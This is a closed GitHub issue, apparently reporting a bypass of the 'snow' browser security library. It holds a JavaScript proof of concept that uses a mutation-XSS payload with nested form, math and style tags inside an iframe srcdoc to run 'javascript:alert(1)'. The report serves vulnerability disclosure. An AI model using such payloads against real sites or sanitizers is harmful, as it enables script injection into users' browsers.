-
Notifications
You must be signed in to change notification settings - Fork 7
Closed
Labels
vulnerabilityIntroduces snow bypassIntroduces snow bypass
Description
var d = document.createElement('div');
document.body.appendChild(d);
d.innerHTML = `<iframe
srcdoc="<form><math><mtext></form><form><mglyph><style></math><iframe src="javascript:alert(1)"></iframe>"
</iframe>`;
Shamelessly stolen from here, I knew something like that would work when I saw this code path (parse, serialize, parse) :)
Reactions are currently unavailable
Metadata
Metadata
Assignees
Labels
vulnerabilityIntroduces snow bypassIntroduces snow bypass